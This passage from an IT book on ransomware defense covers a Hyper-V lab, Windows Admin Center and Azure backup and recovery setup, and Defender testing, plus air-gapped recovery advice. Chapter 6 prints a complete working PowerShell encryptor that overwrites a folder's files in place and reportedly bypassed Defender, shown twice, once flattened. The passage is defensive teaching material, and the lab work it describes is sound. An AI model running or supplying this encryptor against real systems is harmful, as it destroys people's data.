6. Open BigDemo_Insider.PS1 with the PowerShell ISE and edit lines 425 and 434, putting in the product key you received with the EVAL version of Windows Server 2016 downloaded above.
7. Edit line 422, $ServerISO, with the actual path and name of your Server ISO, which should have been downloaded to something like F:\DCBuild_Insider. Save BigDemo_Insider.PS1.
8. Open an administrative PowerShell prompt and run BigDemo_Insider.PS1. For this book we have used the following parameters:
   WorkingDir: f:\DCBuild_Insider
   Organization: MVPDays Rockstars
   Owner: Dave Kawula
   TimeZone: Mountain Standard Time
   AdminPassword: P@ssw0rd
   DomainName: MVPDays.com
   DomainAdminPassword: P@ssw0rd
   VirtualSwitchName: MVPDays_VMM_VSwitch
   Subnet: 172.16.100.
   ExtraLabFiles: C:\
9. It will take approximately 1 hour to build the Lab Environment.

With BigDemo you can create a new Lab Environment on demand. This script has built out Active Directory, DHCP, DNS, and the other core infrastructure components required to get started with your lab.
Chapter 4 Configuring Windows Admin Center
Chapter 4
Configuring Windows Admin Center
In this chapter, we will look at setting up Windows Admin Center in the Lab. We have already installed Windows Admin Center and will start with the basic configurations. For your reference, we used the following PowerShell function during provisioning to download and install Windows Admin Center on the Management Virtual Machine.

    Function Install-WindowsAdminCenter {
        param (
            [string]$VMName,
            [string]$GuestOSName,
            [string]$VMPath,
            [string]$WorkingDir
        )

        #Download Windows Admin Center to c:\post-install
        #$domainCred is not a parameter of this function, so it has to exist in the calling scope
        Invoke-Command -VMName $VMName -Credential $domainCred {
            New-Item -ItemType Directory -Path "c:\Post-Install" -Force:$true | Out-Null
            Write-Output "Downloading Windows Admin Center"
            #Ping the internet to get things working in the lab
            ping www.google.com
            Invoke-WebRequest -UseBasicParsing -Uri https://aka.ms/WACDownload -OutFile "c:\Post-Install\WindowsAdminCenter.msi"

            #Silent install on port 6516 with a generated self-signed certificate
            Write-Output "Installing Windows Admin Center"
            Start-Process msiexec.exe -Wait -ArgumentList "/i c:\Post-Install\WindowsAdminCenter.msi /qn /L*v log.txt SME_PORT=6516 SSL_CERTIFICATE_OPTION=generate"
        }
    }
Install Google Chrome and Mozilla Firefox
You are probably wondering why we would install Google Chrome and Mozilla Firefox in the lab. The answer is very simple: Microsoft Edge does not ship with the Server Operating Systems, and we cannot configure Windows Admin Center without an alternate browser. Once we have things initially configured, we could easily use Edge from another Windows 10 Desktop.

1. Log on to Management01 as Administrator.
2. Download and install Google Chrome and Mozilla Firefox.
Configure Windows Admin Center
In the following steps, we will configure Windows Admin Center with the base configurations.

1. Log on to Management01 as Administrator.
2. Open Firefox and browse to https://localhost:6516
3. Click Advanced and accept the Security Warnings to continue.
4. Log on with Domain Admin Credentials.
5. Click on Skip Tour.
6. Click on Management01.
7. Verify that Windows Admin Center connects and is working.
Configure Azure Integration
In these steps, we will configure Microsoft Azure Integration with Windows Admin Center. These steps are required to configure Hybrid Services such as Azure Backup and Azure Site Recovery.

1. Log on to Management01 as Administrator.
2. Open Firefox and browse to https://localhost:6516
3. Click Advanced and accept the Security Warnings to continue.
4. Log on with Domain Admin Credentials.
5. Click on the Settings Wheel in the top right corner of Windows Admin Center.
6. Verify that Windows Admin Center connects and is working.
7. Click on the Azure option in the menu. Then click Register.
8. On the Register the gateway with Azure pane, click Copy Code and click Device Logon.
9. On the Device Logon screen, paste the code and click Continue.
10. Sign in with your Azure tenant credentials.
11. Close the Microsoft Azure PowerShell window as prompted.
12. Select your tenant ID and click Register. If you don’t know what your tenant ID is, you can click on Azure Active Directory and click Properties.
13. Verify that you see the message successfully registered with Azure Active Directory.
14. Click on Go to Azure AD app Registration.
15. On the Azure App Settings page, click Settings and then click Required Permissions.
16. Click Grant Permissions and click Yes.
17. Once completed, click the close button in Windows Admin Center.
Configure Azure Backup
In these steps, we will test Azure Hybrid integration by setting up Azure Backup on the Management Server.

1. Log on to Management01 as Administrator.
2. Open Firefox and browse to https://localhost:6516
3. Click Advanced and accept the Security Warnings to continue.
4. Log on with Domain Admin Credentials.
5. Click on Management01.
6. Click on Backup and click on Setup Azure Backup.
7. On the Azure Backup tab, click on Login and log in.
8. On the Setup Azure Backup page, click Step 2, Show Details, and change the region to your local region.
9. On Step 3, select c:\ and System State.
10. On Step 3, confirm the Backup Schedule.
11. On Step 4, enter an Encryption Passphrase.
12. Click Apply.
13. Wait while your recovery vault is created.
    Note: Windows Admin Center will create a new recovery vault for each machine that is protected. It is configured this way to avoid throttling of the accounts.
14. Wait until the Azure Backup setup is complete before changing tabs.
15. Once complete, verify the settings.
    Note: This is a great way to test Windows Admin Center integration.
16. Test the backup to the Recovery Vault by clicking Backup Now.
17. Choose Files and Folders and click Backup.
18. You will notice that a job has kicked off for the backup.
19. You will notice that a backup job is in progress.
Verifying Backups Locally with the Microsoft Azure Backup Agent
We can check the status of our Azure Backups with the local Azure Backup Agent that has been installed from Windows Admin Center.

1. Log on to Management01 as Administrator.
2. On the desktop, click on Microsoft Azure Backup.
3. Verify your backups or jobs in progress locally here.
Configuring Windows Azure Update Management
An important part of our Ransomware defense strategy is keeping updated with Windows Updates and Rollups. This can be easily accomplished by integrating Windows Admin Center with Azure Update Management. In the following steps, we will show you how to set up Azure Update Management to keep your servers up to date.

1. Log on to Management01 as Administrator.
2. Open Firefox and browse to https://localhost:6516
3. Click Advanced and accept the Security Warnings to continue.
4. Log on with Domain Admin Credentials.
5. Click on Management01.
6. Click on Updates and then click on Centrally Manage updates on all your servers by using Azure Update Management (Set up now).
7. On the Setup Azure Update Management tab, choose your Subscription.
8. Create a new Resource Group.
9. Choose a Region.
10. Create a new Log Analytics Workspace.
11. Create a new Azure Automation Account and click Set Up.
12. View the progress by checking notification details.
13. Once completed, you should see a success status message.
14. Once setup is complete, click on Manage in Azure.
15. You will see your server show up in Azure Update Management.
16. Next, click on Schedule Update Deployment.
17. On Name type: Daily Updates
18. Complete the deployment settings and select Management01.
19. Once complete, you can see that the updates are managed by Azure Updates.
Configure Azure Site Recovery
An important part of our Ransomware defense strategy is having an up-to-date Disaster Recovery Solution. In the event of a Ransomware attack, the only option might be recovering to a DR Site like Azure.

1. Log on to Management01 as Administrator.
2. Open Firefox and browse to https://localhost:6516
3. Click Advanced and accept the Security Warnings to continue.
4. Log on with Domain Admin Credentials.
5. Click on drtitan01.
6. Click on Virtual Machines and click on Help Protect your VMs from disasters by using Azure Site Recovery (Set up Now).
7. On the Set up host with Azure Site Recovery pane, choose your subscription.
8. Select a Resource Group.
9. Create a new Recovery Services Vault and click Set up ASR.
10. Verify the progress.
11. Verify the progress.
12. On the Inventory tab, you can see the Disaster Recovery status change once it is ready.
13. Configure Azure Site Recovery protection for FS01. Select FS01, click More, and click Protect VM.
14. On the Protect FS01 with Azure Site Recovery window, create a new Storage Account called asrdrtitanstorage.
15. Click Protect VM.
Upgrade to Security Center Standard in Azure
To start seeing metrics and using Security Center, we will need to either start a trial or sign up for Security Center Standard.

1. Open your Azure Portal and browse to Security Center, Getting Started, click on asrransomwarelogs and click Upgrade.
2. Once upgraded, you will see the checkmark on Upgraded.
Chapter 5 Windows Defender Advanced Threat Protection ATP
Chapter 5
Windows Defender Advanced Threat Protection ATP
Windows Defender Advanced Threat Protection (ATP) is an extremely useful add-on to help protect your Windows Servers. This tool gives the capabilities of Windows Defender that is included with Windows Server 2019.
In this chapter, we will give a brief overview of some of the features. To start things off, you will need to sign up for a trial here: https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp?ocid=docs-wdatp-portaloverview-abovefoldlink
Onboarding a Server with Windows Defender ATP

1. Browse to https://securitycenter.windows.com/dashboard
2. Log in with your Admin Credentials.
3. Click on the Settings Wheel, and scroll down to Machine Management.
4. You will notice that there are many different deployment options, from local installation to Group Policy, Configuration Manager, etc.
5. Choose Local Script.
6. Download the Deployment Package to the target server, Management01.
7. Open an Administrative Command Prompt and run WindowsDefenderATPLocalOnboardingScript.cmd
8. Wait approximately 5 minutes and check the Machines List in the Portal.
Reviewing an Incident with Windows Defender Advanced Threat Protection

1. Browse to https://securitycenter.windows.com/dashboard
2. Log in with your Admin Credentials.
3. Here we can see that our machine Management01 has had Occamy Malware detected. We will look at this attack later in the book.
4. If we scroll down on the machine, we can see a timeline of the infection.
5. We can also drill into the alert, giving more information about the incident.
6. We can also see an incident graph.
7. We can also drill into the live investigation that took place for this incident.
Chapter 6 Simulating a Ransomware Attack
Chapter 6
Simulating a Ransomware Attack
KnowBe4 Ransomware Simulator on Windows Server 2019
RanSim will simulate 13 ransomware infection scenarios and 1 crypto mining infection scenario and show you if a workstation is vulnerable.

1. In order to initially test the Ransomware Simulator, we are going to have to turn off Windows Defender Protection on our Windows Server 2019 machine Management01. If you don’t do this, the installation of the Ransomware Simulator will fail.
2. Download the KnowBe4 Ransomware Simulator from https://www.knowbe4.com/ransomware-simulator
3. Run SimulatorSetup.exe and click Install.
4. Once Setup has completed, close the installation window.
5. The files for the installation are located in c:\users\administrator.mssmoa\appdata\
6. This is where the temp files are stored for testing during the Ransomware tests.
7. On the KnowBe4 Ransomware Simulator window, click Launch.
8. On the KnowBe4 RanSim window, click Launch.
9. We will launch the attack initially with Defender disabled and see what happens.
10. You will see a test folder get created; you don’t see this when Windows Defender is enabled.
11. You will be able to see the files being encrypted in real time in here.
12. We can see that 14/14 scenarios succeeded with Windows Defender off.
13. Now let us turn Windows Defender Protection back on.
14. Re-run the tests, this time with protection enabled.
15. You can see right away that Windows Defender found a problem.
16. We can see that Trojan.Win32/Occamy.C was found.
17. One of the things that I noticed when Defender was enabled was that the Ransomware Tool was very slow and unresponsive.
18. And we can see that after a long period of time none of these attacks succeeded directly on the server.
Enabling Ransomware Protection on Windows Server 2019
A new feature with Windows Server 2019 is Ransomware Protection. In the following steps, we will re-run the tests with the Ransomware Simulator RanSim and see the output.

1. Open Windows Security and click on Ransomware Protection.
2. Click on Manage Ransomware Protection.
3. Turn on Controlled folder access.
4. Click on Protected Folders to see what folders are protected by default.
5. Click on Add Protected Folder and add C:\Users\Administrator.MMSMOA\appdata\local\RnSimulator
6. Re-run the RanSim tests.
7. Right away, a new popup showed that Unauthorized Changes Blocked collector.exe from making changes.
8. Moreover, we can see that after a long period none of these attacks succeeded directly on the server.
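The same Controlled folder access settings can be applied and checked from PowerShell with the built-in Defender cmdlets, and the blocks behind the "Unauthorized changes blocked" popup can be read back from the Defender operational log. This is an added example, not part of the book's lab scripts; the function names are hypothetical and the folder in the sample call is a placeholder for the RanSim test folder on your machine.

```powershell
#Requires -RunAsAdministrator
# Added example. Uses the Defender module that ships with Windows Server 2019.

function Enable-LabFolderProtection {
    # Adds folders to the protected list and switches Controlled folder access on.
    # Use -Mode AuditMode to log what would be blocked without blocking it.
    param(
        [Parameter(Mandatory)][string[]]$Folder,
        [ValidateSet('Enabled', 'AuditMode')][string]$Mode = 'Enabled'
    )
    foreach ($f in $Folder) {
        if (-not (Test-Path -LiteralPath $f -PathType Container)) {
            Write-Warning "Skipping '$f': folder does not exist."
            continue
        }
        # Add-MpPreference appends to the list; Set-MpPreference would replace it.
        Add-MpPreference -ControlledFolderAccessProtectedFolders $f
    }
    Set-MpPreference -EnableControlledFolderAccess $Mode

    # Read the effective configuration back instead of trusting the calls above.
    $pref = Get-MpPreference
    [pscustomobject]@{
        Mode             = $pref.EnableControlledFolderAccess   # 0 = disabled, 1 = enabled, 2 = audit
        ProtectedFolders = $pref.ControlledFolderAccessProtectedFolders
    }
}

function Get-LabFolderProtectionEvent {
    # Event 1123 = change blocked, 1124 = change audited (audit mode).
    param([int]$LastHours = 1)
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1123, 1124
        StartTime = (Get-Date).AddHours(-$LastHours)
    }
    # Get-WinEvent raises an error when nothing matches, so an empty result is silenced.
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Sort-Object TimeCreated |
        Select-Object TimeCreated, Id,
            @{ Name = 'Action'; Expression = { if ($_.Id -eq 1123) { 'Blocked' } else { 'Audited' } } },
            Message
}

# Sample calls (placeholder path):
# Enable-LabFolderProtection -Folder 'C:\Path\To\RanSim\TestFolder'
# Get-LabFolderProtectionEvent -LastHours 1 | Format-List
```

After re-running the RanSim tests, each block of collector.exe should appear as an event 1123 entry whose message names the process and the protected path.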
Executing a Ransomware Attack with PowerShell
The code below is only to be used for testing purposes. Do not run this in a production environment. None of the authors of this book take any responsibility for your actions. Windows Defender will not pick this attack up because it was executed with Administrative Credentials. This means that in this case, you are now the victim of a Ransomware Attack.

    Add-Type -AssemblyName System.Windows.Forms
    $FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog
    [void]$FolderBrowser.ShowDialog()
    $FolderBrowser.SelectedPath

    #global variables
    $csv = "C:\windows\temp\drives.csv"

    #Define the cert to use for encryption
    #Create your own cert with this command; New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local
    $Cert = $(Get-ChildItem Cert:\LocalMachine\My\60BD2E50C9EB3937CB3DA6FBF2C5ACC925F3C00A)
    $Cert

    #discover the other folders beneath the selectedpath
    $FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) -and ( $_.Name -like "*$fileName*") } | % {$_.FullName} -ErrorAction SilentlyContinue
    $FilestoEncrypt

    Function Encrypt-File
    {
        Param([Parameter(mandatory=$true)][System.IO.FileInfo]$FilesToEncrypt,
              [Parameter(mandatory=$true)][System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)

        Try { [System.Reflection.Assembly]::LoadWithPartialName("System.Security.Cryptography") }
        Catch { Write-Error "Could not load required assembly."; Return }

        $AesProvider = New-Object System.Security.Cryptography.AesManaged
        $AesProvider.KeySize = 256
        $AesProvider.BlockSize = 128
        $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC
        $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter($Cert.PublicKey.Key)
        [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType())
        [Byte[]]$LenKey = $Null
        [Byte[]]$LenIV = $Null
        [Int]$LKey = $KeyEncrypted.Length
        $LenKey = [System.BitConverter]::GetBytes($LKey)
        [Int]$LIV = $AesProvider.IV.Length
        $LenIV = [System.BitConverter]::GetBytes($LIV)
        $FileStreamWriter
        Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Name)", [System.IO.FileMode]::Create) }
        Catch { Write-Error "Unable to open output file for writing."; Return }
        $FileStreamWriter.Write($LenKey, 0, 4)
        $FileStreamWriter.Write($LenIV, 0, 4)
        $FileStreamWriter.Write($KeyEncrypted, 0, $LKey)
        $FileStreamWriter.Write($AesProvider.IV, 0, $LIV)
        $Transform = $AesProvider.CreateEncryptor()
        $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write)
        [Int]$Count = 0
        [Int]$Offset = 0
        [Int]$BlockSizeBytes = $AesProvider.BlockSize / 8
        [Byte[]]$Data = New-Object Byte[] $BlockSizeBytes
        [Int]$BytesRead = 0
        Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) }
        Catch { Write-Error "Unable to open input file for reading."; Return }
        Do
        {
            $Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes)
            $Offset += $Count
            $CryptoStream.Write($Data, 0, $Count)
            $BytesRead += $BlockSizeBytes
        }
        While ($Count -gt 0)

        $CryptoStream.FlushFinalBlock()
        $CryptoStream.Close()
        $FileStreamReader.Close()
        $FileStreamWriter.Close()
        copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force
    }

    #Encrypt each file
    foreach ($file in $FilesToEncrypt)
    {
        Write-Host "Encrypting $file"
        Encrypt-File $file $Cert -ErrorAction SilentlyContinue
    }
    Exit
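For cleaning up the lab after the test, the recovery counterpart of Encrypt-File follows from the file layout it writes: two 4-byte lengths, the RSA-wrapped AES key, the IV, then the AES-256-CBC ciphertext. This is an added example, not code from the book; the function name Restore-LabFile and the .restored output suffix are hypothetical, and it assumes the certificate used for the test is still in the store with its private key.

```powershell
# Added example: reverses the lab's Encrypt-File for a single file.
# Layout read here, as written by Encrypt-File (lengths are 4-byte little-endian Int32):
#   [LenKey][LenIV][RSA-wrapped AES key][IV][AES-256-CBC ciphertext]
function Restore-LabFile {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert,
        [string]$OutFile = "$Path.restored"   # never overwrite the encrypted copy
    )

    if (-not $Cert.HasPrivateKey) {
        throw "Certificate $($Cert.Thumbprint) has no private key, so the AES key cannot be unwrapped."
    }

    # .NET file APIs ignore the PowerShell location, so resolve both paths first.
    $inPath  = (Resolve-Path -LiteralPath $Path).ProviderPath
    $outPath = $PSCmdlet.GetUnresolvedProviderPathFromPSPath($OutFile)

    # Works for both CSP and CNG keys (New-SelfSignedCertificate creates a CNG key by default).
    $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($Cert)
    $in  = [System.IO.File]::OpenRead($inPath)
    $out = $null
    $aes = $null
    try {
        $reader = New-Object System.IO.BinaryReader($in)
        $lenKey = $reader.ReadInt32()
        $lenIV  = $reader.ReadInt32()

        # A file that was never encrypted by the script yields nonsense lengths here.
        if ($lenIV -ne 16 -or $lenKey -ne ($rsa.KeySize / 8)) {
            throw "'$inPath' does not have the header Encrypt-File writes for this certificate."
        }
        $wrappedKey = $reader.ReadBytes($lenKey)
        $iv         = $reader.ReadBytes($lenIV)

        $aes      = New-Object System.Security.Cryptography.AesManaged
        $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
        # RSAPKCS1KeyExchangeFormatter wraps with PKCS#1 v1.5, so unwrap with the same padding.
        $aes.Key  = $rsa.Decrypt($wrappedKey, [System.Security.Cryptography.RSAEncryptionPadding]::Pkcs1)
        $aes.IV   = $iv

        # The stream is now positioned at the first ciphertext byte.
        $crypto = New-Object System.Security.Cryptography.CryptoStream(
            $in, $aes.CreateDecryptor(), [System.Security.Cryptography.CryptoStreamMode]::Read)
        $out = [System.IO.File]::Create($outPath)
        $crypto.CopyTo($out)
    }
    catch {
        # Do not leave a truncated output file behind on a wrong key or damaged input.
        if ($out) { $out.Dispose(); $out = $null; Remove-Item -LiteralPath $outPath -ErrorAction SilentlyContinue }
        throw
    }
    finally {
        if ($out) { $out.Dispose() }
        $in.Dispose()
        if ($aes) { $aes.Dispose() }
        $rsa.Dispose()
    }
    Get-Item -LiteralPath $outPath
}

# Sample call; <thumbprint> is a placeholder for the certificate created for the test:
# $Cert = Get-ChildItem Cert:\LocalMachine\My\<thumbprint>
# Restore-LabFile -Path 'C:\Path\To\TestFolder\file.txt' -Cert $Cert
```

The wrapped AES key is different for every file and can only be unwrapped with the certificate's private key, so deleting the test certificate before restoring makes the files unrecoverable.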
Instructions
1. Open PowerShell ISE and run as Administrator 2. Run this code to select the target folder. We will use one of the sample RanSIm Folders. 3. C:\Users\Administrator.M MSMOA\appdata\local\R nSimulator\TestFolder\Te sts\1-Tests
Screenshot (if applicable)
Add-Type -AssemblyName System.Windows.Forms $FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog [void]$FolderBrowser.ShowDialog() $FolderBrowser.SelectedPath
4. Select the folder and click ok
147
Chapter 6 Simulating a Ransomware Attack
5. Create a new Self Signed Certificate 6. Copy the thumbprint to the clipboard
New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local
7. Run the following to put the Certificate into the $Cert Variable
$Cert = $(Get-ChildItem Cert:\LocalMachine\My\7BD220D0D93475829CD40B4C1A67C2C 89DA4DBCD) $Cert
8. Then Grab the files from the folder
$FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) } | % {$_.FullName} ErrorAction SilentlyContinue $FilestoEncrypt
9. Run the Encrypt-File Function
Function Encrypt-File { Param([Parameter(mandatory=$true)][System.IO.FileInfo ]$FilesToEncrypt, [Parameter(mandatory=$true)][System.Security.Cryptogr aphy.X509Certificates.X509Certificate2]$Cert) Try { [System.Reflection.Assembly]::LoadWithPartialName("Sy stem.Security.Cryptography") } Catch { Write-Error "Could not load required assembly."; Return }
$AesProvider = New-Object System.Security.Cryptography.AesManaged $AesProvider.KeySize = 256 $AesProvider.BlockSize = 128 $AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC $KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeForma tter($Cert.PublicKey.Key) [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType()) [Byte[]]$LenKey = $Null [Byte[]]$LenIV = $Null [Int]$LKey = $KeyEncrypted.Length $LenKey = [System.BitConverter]::GetBytes($LKey) [Int]$LIV = $AesProvider.IV.Length $LenIV = [System.BitConverter]::GetBytes($LIV) $FileStreamWriter Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Nam e)", [System.IO.FileMode]::Create) } Catch { Write-Error "Unable to open output file for writing."; Return } $FileStreamWriter.Write($LenKey, 0, 4) $FileStreamWriter.Write($LenIV, 0, 4) $FileStreamWriter.Write($KeyEncrypted, 0, $LKey) $FileStreamWriter.Write($AesProvider.IV, 0, $LIV) $Transform = $AesProvider.CreateEncryptor() $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStream Writer, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Writ e) [Int]$Count = 0 [Int]$Offset = 0 [Int]$BlockSizeBytes = $AesProvider.BlockSize / 8 [Byte[]]$Data = New-Object Byte[] $BlockSizeBytes [Int]$BytesRead = 0 Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) } Catch { Write-Error "Unable to open input file for reading."; Return } Do { $Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes) $Offset += $Count $CryptoStream.Write($Data, 0, $Count)
$BytesRead += $BlockSizeBytes } While ($Count -gt 0) $CryptoStream.FlushFinalBlock() $CryptoStream.Close() $FileStreamReader.Close() $FileStreamWriter.Close() copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force }
10. Try Encrypting your files
foreach ($file in $FilesToEncrypt) { Write-Host "Encrypting $file" Encrypt-File $file $Cert -ErrorAction SilentlyContinue }
11. The Ransomware attack was successful and bypassed Windows Defender, ATP, and Ransomware Protection
12. I renamed one of the files and took the .exe off the end; it is indeed encrypted.
Chapter 7
Recovering from Ransomware using Azure Site Recovery
Notes from the Field
Why Airgapped Replicas are the only choice
So what is an air-gapped backup anyway? Here is what Wikipedia has to say:
An air gap, air wall or air gapping is a network security measure employed on one or more computers to ensure that a secure computer network is physically isolated from unsecured networks, such as the public Internet or an unsecured local area network. It means a computer or network has no network interfaces connected to other networks, with a physical or conceptual air gap, analogous to the air gap used in plumbing to maintain water quality.
In layman’s terms, it means that you must keep a copy of your backups and replicas offline.
Why Planned Failover is no longer an option
Planned Failover is the normal process of failing over to replica recovery points at a different location. What the planned failover process does is the following:
1. Once kicked off, it takes a final sync of the source machines.
2. Then, once replication completes, it turns off the Source Virtual Machine.
3. At this point, it takes one final sync to capture the remaining changes. This can only be done once the Virtual Machine is off. Think of a SQL Server or Exchange Server that was processing transactions during the first sync. The system cannot guarantee all of the records are there until the Virtual Machine is off. That is why it shuts down the source machine to complete the final delta sync.
4. Once the sync is completed, the Virtual Machine is powered on in your Microsoft Azure Tenant.
Why will this not work in a Ransomware Situation?
Because if the source machine was infected and the files were encrypted, you just took the encrypted files up to Azure and turned on the Virtual Machine.
Failover Now is the only Option
With the Planned Failover process not viable for us, the only option is to use the Failover Now or Failover option. This will allow us to select a point in time to simply power on the Virtual Machine.
1. The steps to perform Failover Now are easier and faster than a planned failover. First, you choose the Virtual Machine from the Azure Recovery Vault.
2. Next, you select the Failover button
3. Choose the restore point
4. Turn on the VM
The total amount of time to turn on an air-gapped replica virtual machine is minutes.
Watch your Six (Clock)
When dealing with a ransomware incident, nobody is going to have your back. You do not have the luxury of time when it comes to a ransomware attack. If you had configured a maximum of 30 restore points in Azure, the clock is ticking. If the source Virtual Machine is still on, your Azure Site Recovery jobs are still bringing the nonviable recovery points into your vault. If you outrun the number of restore points and all you have is infected or cryptoed files, then Azure Site Recovery was pointless.
Do not connect your Azure Site Recovery Virtual Machines to a live Site-to-Site VPN
There is a big difference between traditional Disaster Recovery protection and the level of protection that is required to survive a ransomware attack. Think of it this way: many of us run a live Domain Controller in the cloud. What happens when we have a live incident and the source on-prem side is compromised? Do you think that Azure Virtual Machine running as a domain controller is safe? Earlier in the book, we showed you what an admin-level ransomware attack looked like for core infrastructure roles like Domain Controllers. What this means for you is that you must keep tight control and maintain the “Air Gap” between your on-prem infrastructure and the cloud. Once you have safely recovered to a previous recovery point and cleaned up the on-prem side, you will be able to set up a Site-to-Site VPN to give users access.
When can I get back into my data?
Oh, do I love the phone calls of people screaming at me, wondering when they will be able to get their data back. What they don’t understand is that they are lucky we have any data at all. If you didn’t have an air-gapped backup and DR solution, you could be looking at something like this:
Dear CEO,
I think it is the time that we notify the public of the breach that has occurred on 04/13/2019. None of our services will be viable for the next foreseeable future. You should look at issuing a public statement and having our teams contact our business partners. Those million dollar shipment of supplies will not be arriving on time.
Blah Blah
If you think that this situation doesn’t happen, you are dead wrong. If you ask a room of IT Professionals how many have been impacted by some type of Ransomware attack in the past 3 years, most of them would put their hands up.
So, the short answer to the question “When can I get my data back?” is: as soon as we can.
Trust me on this one point, my friends: if the options are nothing or a recovery point that is 24 or 48 hours old, the business will be extremely thankful that they have something to keep going. The painstaking process of rekeying data in a Ransomware Attack is something that you won’t be able to overcome. Our first and primary concern is getting them back at all.
Ok, so I didn’t listen and lost everything, now what?
If you didn’t have an air-gapped solution and you lost everything, now what? Well, it becomes one giant salvage operation, starting here:
1. Rebuilding Core Infrastructure Roles
   a. Active Directory
   b. DNS
   c. DHCP
2. Rebuilding all the Workstations
3. Rebuild SQL, Exchange, SharePoint
4. Praying our backups go back far enough
You are talking about weeks, if not months, of downtime for some of these services, if not all of them.
Don’t forget to tune your Replication Policy
Your Replication Policy will determine how many recovery points you have available. What does this mean to you, the IT Pro or Cloud Admin? It means that this is the amount of time you have to make a decision when a Ransomware attack occurs. If you only have 7 days’ worth of recovery points in the cloud, it means you have a maximum of 7 days to make a decision. You cannot take the weekend off if you get a ransomware attack. You must act immediately and make a decision. The nice part about being able to recover in the cloud is that you can actually recover offline and not directly connect back to the core infrastructure.
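The decision window described above can be worked out from the recovery points themselves. The following PowerShell is an added example, not code from the book: the function name, its parameters, the one-hour safety margin and the sample recovery points are constructed for illustration. It assumes each point exposes a RecoveryPointTime property (as the objects returned by the Az module's Get-AzRecoveryServicesAsrRecoveryPoint do) and that a point is pruned once it is older than the policy's retention.

```powershell
# Added example (not from the book). Works out which recovery point to fail over to
# and how long that point will remain in the vault.
function Get-CleanRecoveryPointWindow {
    param(
        # Objects with a RecoveryPointTime property (assumption: the shape returned by
        # Get-AzRecoveryServicesAsrRecoveryPoint -ReplicationProtectedItem $item).
        [Parameter(Mandatory = $true)][object[]]$RecoveryPoints,
        # Earliest time encryption was observed on the source machine.
        [Parameter(Mandatory = $true)][datetime]$FirstEncryptionSeen,
        # Retention configured in the replication policy, in hours.
        [Parameter(Mandatory = $true)][int]$RetentionHours,
        [datetime]$Now = (Get-Date),
        # Assumed margin: treat points taken shortly before detection as suspect.
        [int]$SafetyMarginMinutes = 60
    )

    $cutoff     = $FirstEncryptionSeen.AddMinutes(-$SafetyMarginMinutes)
    $oldestKept = $Now.AddHours(-$RetentionHours)

    # Points still inside the retention window, oldest first.
    $available = @($RecoveryPoints |
        Where-Object { $_.RecoveryPointTime -ge $oldestKept } |
        Sort-Object -Property RecoveryPointTime)
    $clean = @($available | Where-Object { $_.RecoveryPointTime -lt $cutoff })

    if ($clean.Count -eq 0) {
        # Edge case from the text: the vault now holds only post-attack points.
        return [pscustomobject]@{
            AvailablePoints = $available.Count
            CleanPoints     = 0
            FailoverTo      = $null
            ExpiresAt       = $null
            HoursLeft       = 0
        }
    }

    # The newest clean point loses the least data and is the last one to age out.
    $best      = $clean[-1]
    $expiresAt = $best.RecoveryPointTime.AddHours($RetentionHours)

    [pscustomobject]@{
        AvailablePoints = $available.Count
        CleanPoints     = $clean.Count
        FailoverTo      = $best.RecoveryPointTime
        ExpiresAt       = $expiresAt
        HoursLeft       = [math]::Round(($expiresAt - $Now).TotalHours, 1)
    }
}

# Constructed sample: one recovery point every 6 hours, 72-hour retention.
$start  = [datetime]'2019-04-12T12:00:00'
$points = 0..11 | ForEach-Object {
    [pscustomobject]@{ Name = "rp$_"; RecoveryPointTime = $start.AddHours(6 * $_) }
}

Get-CleanRecoveryPointWindow -RecoveryPoints $points `
    -FirstEncryptionSeen ([datetime]'2019-04-13T14:30:00') `
    -RetentionHours 72 `
    -Now ([datetime]'2019-04-15T09:00:00')
```

HoursLeft is the time remaining before the last clean point is pruned; when CleanPoints is 0 the vault no longer holds a usable point.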
Testing Failover can be a quick Ransomware Fix
Using the Test Failover option can be a very quick ransomware fix for your organization. With this option, you can quickly create a portable environment to either get files back or to check the viability of your Azure Site Recovery Points. We often recommend to our clients that they should be testing their Recovery Points quarterly. This is safe to do in an offline environment and doesn’t take that long to complete.
